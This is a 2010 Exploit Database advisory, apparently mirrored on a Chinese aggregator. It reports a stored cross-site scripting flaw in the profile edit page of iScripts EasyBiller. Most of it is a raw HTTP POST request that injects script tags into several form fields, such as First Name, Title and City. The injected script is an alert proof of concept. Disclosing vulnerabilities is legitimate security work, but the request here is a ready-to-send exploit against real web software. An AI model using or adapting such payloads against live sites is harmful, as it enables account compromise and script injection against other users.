iScripts EasyBiller – Cross-Site Scripting

• Exploit Database
• 31 阅读

• 作者： Sangteamtham
  日期： 2010-07-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14165/

• $-------------------------------------------------------------------------------------------------------------------
  $iScripts EasyBiller Cross Site Scripting Vulnerabilities
  $Author : Sangteamtham
  $Home : Hcegroup.net 
  $Download : http://www.iscripts.com/easybiller/ 
  $Date : 02/07/2010
  $Email: sangteamhtham@gmail.com 					 
  $******************************************************************************************
  $Exploit:
  $
  $ Cross Site Scripting (XSS):
  $
  $ When attackers login with your user infomation, attackers update their profile by injecting javascript into fields like
  $ "First Name","Title"
  $ 
  Code:
  *********************************************************************************************
  Host: www.server.com
  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-us,en;q=0.5
  Accept-Encoding: gzip,deflate
  Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
  Keep-Alive: 115
  Connection: keep-alive
  Referer: http://server/editprofile.php
  Cookie: PHPSESSID=110cc00db753eaf050d491dd62c7ebb6; fcspersistslider1=6; __utma=227100805.1045538127.1278085802.1278085802.1278085802.1; __utmb=227100805; __utmc=227100805; __utmz=227100805.1278085802.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); flag_entryformfilled=easywebsurvey
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 906
  txtEmail=user%40server&txtName=%22%3E%22%3E%3Cscript%3Ealert%28%22Sangteamtham+was+here%22%29%3C%2Fscript%3E&txtlastName=%22%3E%22%3E%3Cscript%3Ealert%28%22Sangteamtham+was+here%22%29%3B%3C%2Fscript%3E&txtTitle=%22%3E%22%3E%3Cscript%3Ealert%28%22Sangteamtham+was+here%22%29%3B%3C%2Fscript%3E&txtOrganization=%22%3E%22%3E%3Cscript%3Ealert%28%22Sangteamtham+was+here%22%29%3B%3C%2Fscript%3E&txtAddress=%22%3E%22%3E%3Cscript%3Ealert%28%22Sangteamtham+was+here%22%29%3C%2Fscript%3E&txtCity=%22%3E%22%3E%3Cscript%3Ealert%28%22Sangteamtham+was+here%22%29%3C%2Fscript%3E&txtState=California%22%3E%22%3E%3Cscript%3Ealert%28%22Sangteamtham+was+here%22%29%3C%2Fscript%3E&ddlCountry=UnitedStates&txtZIP=684567&txtPhone=9823134545&txtFax=98758282828478&cmbCssId=2&txtTechContactName=richard&txtTechContactEmail=richard%40gmail.com&txtBillContactName=samuel&txtBillContactEmail=samuel%40gmail.com&btnSubmit=Update
  
  $******************************************************************************************
  $ Greetz to: All Vietnamese hackers and Hackers out there researching for more security
  $
  $
  $--------------------------------------------------------------------------------------------------------------------